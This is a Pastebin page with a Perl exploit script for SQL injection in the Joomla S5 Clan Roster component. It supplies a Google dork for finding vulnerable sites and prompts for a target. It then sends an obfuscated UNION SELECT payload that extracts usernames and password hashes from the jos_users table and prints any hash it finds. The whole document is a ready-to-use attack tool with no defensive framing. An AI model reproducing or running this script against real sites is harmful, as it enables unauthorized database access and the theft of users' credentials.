Advertisement
Googleinurl

Joomla S5 Clan Roster com_s5clanroster SQL Injection

Jul 6th, 2015
2,645
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 1.24 KB | None | 0 0
  1. #!/usr/bin/perl
  2. #Exploit title: Joomla S5 Clan Roster com_s5clanroster SQL Injection exploit
  3. #Google Dork: inurl:index.php?option=com_s5clanroster&
  4. #Vendor HomePage: http://www.joomla.org/
  5. system("clear");
  6. system("cls");
  7. print "=========================================================\n";
  8. print "* Joomla S5 Clan Roster com_s5clanroster SQL Injection  *\n";
  9. print "*               Coded by TheLooper                      *\n";
  10. print "*        Greetz: To All My Friends <3                   *\n";
  11. print "=========================================================\n";
  12. sleep 1;
  13. use LWP::UserAgent;
  14. print "Enter the target site: ";
  15. chomp(my $target=<STDIN>);
  16. $code="%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(username,0x3a,password),222+from+jos_users--%20-";
  17. $agent = LWP::UserAgent->new() or die "[!] Error while processing";
  18. $agent->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.12011');
  19. $host= $target. "/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null".$code;
  20. $ok = $agent->request(HTTP::Request->new(GET=>$host));
  21. $ok1 = $ok->content; if ($ok1 =~/([0-9a-fA-F]{32})/){
  22. print "[+] Password found --> $1\n$2\n";
  23. sleep 1;
  24. }
  25. else
  26. {
  27. print "Password not found \n";
  28. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement